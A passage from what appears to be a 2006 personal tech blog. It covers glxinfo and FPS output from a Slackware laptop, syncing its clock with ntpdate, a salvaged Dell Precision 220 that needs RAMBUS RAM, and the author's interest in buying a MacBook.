291 frames in 7.0 seconds = 41.571 FPS
140 frames in 5.0 seconds = 28.000 FPS
280 frames in 8.0 seconds = 35.000 FPS
140 frames in 5.0 seconds = 28.000 FPS
bash-3.00$

Those FPS aren't all that hot. Running 'glxinfo', I get the following:

bash-3.00$ glxinfo
name of display: :0.0
display: :0 screen: 0
direct rendering: No
server glx vendor string: SGI
server glx version string: 1.2
server glx extensions:
GLX_ARB_multisample, GLX_EXT_visual_info, GLX_EXT_visual_rating,
GLX_EXT_import_context, GLX_OML_swap_method, GLX_SGI_make_current_read,
GLX_SGIS_multisample, GLX_SGIX_fbconfig
client glx vendor string: SGI
client glx version string: 1.4
client glx extensions:
GLX_ARB_get_proc_address, GLX_ARB_multisample, GLX_EXT_import_context,
GLX_EXT_visual_info, GLX_EXT_visual_rating, GLX_MESA_allocate_memory,
GLX_MESA_swap_control, GLX_MESA_swap_frame_usage, GLX_OML_swap_method,
GLX_OML_sync_control, GLX_SGI_make_current_read, GLX_SGI_swap_control,
GLX_SGI_video_sync, GLX_SGIS_multisample, GLX_SGIX_fbconfig,
GLX_SGIX_pbuffer, GLX_SGIX_visual_select_group
GLX extensions:
GLX_ARB_get_proc_address, GLX_ARB_multisample, GLX_EXT_import_context,
GLX_EXT_visual_info, GLX_EXT_visual_rating, GLX_OML_swap_method,
GLX_SGI_make_current_read, GLX_SGIS_multisample, GLX_SGIX_fbconfig
OpenGL vendor string: Mesa project: www.mesa3d.org
OpenGL renderer string: Mesa GLX Indirect
OpenGL version string: 1.2 (1.5 Mesa 6.2.1)
OpenGL extensions:
GL_ARB_depth_texture, GL_ARB_imaging, GL_ARB_multitexture,
GL_ARB_point_parameters, GL_ARB_point_sprite, GL_ARB_shadow,
GL_ARB_shadow_ambient, GL_ARB_texture_border_clamp,
GL_ARB_texture_cube_map, GL_ARB_texture_env_add,
GL_ARB_texture_env_combine, GL_ARB_texture_env_crossbar,
GL_ARB_texture_env_dot3, GL_ARB_texture_mirrored_repeat,
GL_ARB_transpose_matrix, GL_ARB_window_pos, GL_EXT_abgr, GL_EXT_bgra,
GL_EXT_blend_color, GL_EXT_blend_func_separate, GL_EXT_blend_logic_op,
GL_EXT_blend_minmax, GL_EXT_blend_subtract, GL_EXT_clip_volume_hint,
GL_EXT_copy_texture, GL_EXT_draw_range_elements, GL_EXT_fog_coord,
GL_EXT_multi_draw_arrays, GL_EXT_packed_pixels, GL_EXT_point_parameters,
GL_EXT_polygon_offset, GL_EXT_rescale_normal, GL_EXT_secondary_color,
GL_EXT_separate_specular_color, GL_EXT_shadow_funcs,
GL_EXT_stencil_two_side, GL_EXT_stencil_wrap, GL_EXT_subtexture,
GL_EXT_texture, GL_EXT_texture3D, GL_EXT_texture_edge_clamp,
GL_EXT_texture_env_add, GL_EXT_texture_env_combine,
GL_EXT_texture_env_dot3, GL_EXT_texture_lod_bias, GL_EXT_texture_object,
GL_EXT_texture_rectangle, GL_EXT_vertex_array, GL_APPLE_packed_pixels,
GL_ATI_texture_env_combine3, GL_ATI_texture_mirror_once,
GL_ATIX_texture_env_combine3, GL_IBM_texture_mirrored_repeat,
GL_INGR_blend_func_separate, GL_MESA_pack_invert, GL_MESA_ycbcr_texture,
GL_NV_blend_square, GL_NV_point_sprite, GL_NV_texgen_reflection,
GL_NV_texture_rectangle, GL_SGIS_generate_mipmap,
GL_SGIS_texture_border_clamp, GL_SGIS_texture_edge_clamp,
GL_SGIS_texture_lod, GL_SGIX_depth_texture, GL_SGIX_shadow,
GL_SGIX_shadow_ambient, GL_SUN_multi_draw_arrays
glu version: 1.3
glu extensions:
GLU_EXT_nurbs_tessellator, GLU_EXT_object_space_tess

visual x bf lv rg d st colorbuffer ax dp st accumbuffer ms cav
id dep cl sp sz l ci b ro r g b a bf th cl r g b a ns b eat
----------------------------------------------------------------------
0x23 24 tc 0 24 0 r y . 8 8 8 0 0 16 0 0 0 0 0 0 0 None
0x24 24 tc 0 24 0 r y . 8 8 8 0 0 16 8 16 16 16 0 0 0 None
0x25 24 tc 0 32 0 r y . 8 8 8 8 0 16 8 16 16 16 16 0 0 None
0x26 24 tc 0 32 0 r . . 8 8 8 8 0 16 8 16 16 16 16 0 0 None
0x27 24 dc 0 24 0 r y . 8 8 8 0 0 16 0 0 0 0 0 0 0 None
0x28 24 dc 0 24 0 r y . 8 8 8 0 0 16 8 16 16 16 0 0 0 None
0x29 24 dc 0 32 0 r y . 8 8 8 8 0 16 8 16 16 16 16 0 0 None
0x2a 24 dc 0 32 0 r . . 8 8 8 8 0 16 8 16 16 16 16 0 0 None
bash-3.00$

It's more gibberish than anything, to me. I'll figure this out. Actually, maybe I should be hacking my more recent Dell instead.

On the laptop note, I'm seriously thinking of getting the Macintosh MacBook (13"), white edition. While the black looks nice, the price tag reflects a $200 difference from the white one, with very little hardware difference. Maybe this X-mas?!

Thursday, May 18, 2006

Talk about time lapse!

I plugged in my Toshiba that happens to be running Slackware-current. It's been off awhile and I noticed that the time was an hour or so behind, so I ran the below:

root@toshi:~# ntpdate ntp.nasa.gov
Looking for host ntp.nasa.gov and service ntp
host found : ntp-nasa.arc.nasa.gov
18 May 19:23:05 ntpdate[2185]: step time server 198.123.30.132 offset 4042.874524 sec
root@toshi:~# ntpdate ntp.nasa.gov
Looking for host ntp.nasa.gov and service ntp
host found : ntp-nasa.arc.nasa.gov
18 May 19:23:09 ntpdate[2188]: adjust time server 198.123.30.132 offset -0.000203 sec

I know this thing has a CMOS battery. Why the hell did it lose that much time??

I also got a Dell Precision 220 from work yesterday. They were going to throw it out. It's a decent system, but a coworker stripped the RAM before I got ahold of it. Unfortunately, it requires RAMBUS RAM. I'm looking now on eBay for some cheap RAMBUS RAM. The machine is dual proc capable but has one 667MHz Pentium III CPU. It is all IDE instead of SCSI like my Precision 410, but that's OK. Its internal layout is nice for a flat case. It has 2xUSB ports in the back. It has 5 PCI slots, so I can add a USB 2.0 PCI card when I get the chance. It has an integrated NIC (10/100) and came with a V770 PCI vidcard. It also has a Zip Drive. It has space for two hard disks and a CD drive. I have spare hard disks (all SCSI though). I may add SATA technology to it, though. I also grabbed a 17" CRT monitor that was about to be trashed also, and a bunch of CAT5 (that was golden, as CAT5 is expensive). I only need to decide what OS/distro I'm going to put on it...maybe NetBSD, as I already have a FreeBSD and an OpenBSD box. I also need to decide what duties this box will perform. The box has some life left, as it will take a gig of RAM and the CPU is upgradable to 1GHz.

I now need a big rack, as my systems are starting to pile up and my computer room looks horrendous!

A Dell rep or contractor will be showing up at my home tomorrow to repair my Inspiron 8500's monitor. Tomorrow is the last day of its service contract. I may renew it, as that laptop is my powerhouse machine, the most high-end system I have. My self-built tower probably has more raw horsepower (it's my gaming machine) but the Inspiron is trouble-free and does indeed have serious power at 2GHz. I usually watch my TiVo'd movies on it, crunch data on it when I boot into Slackware (it's a dual boot machine), or watch DVDs.

I'm still eyeing a Mac laptop or maybe even a Mac mini. Funds are the issue. We shall see what the near future holds for me. ;)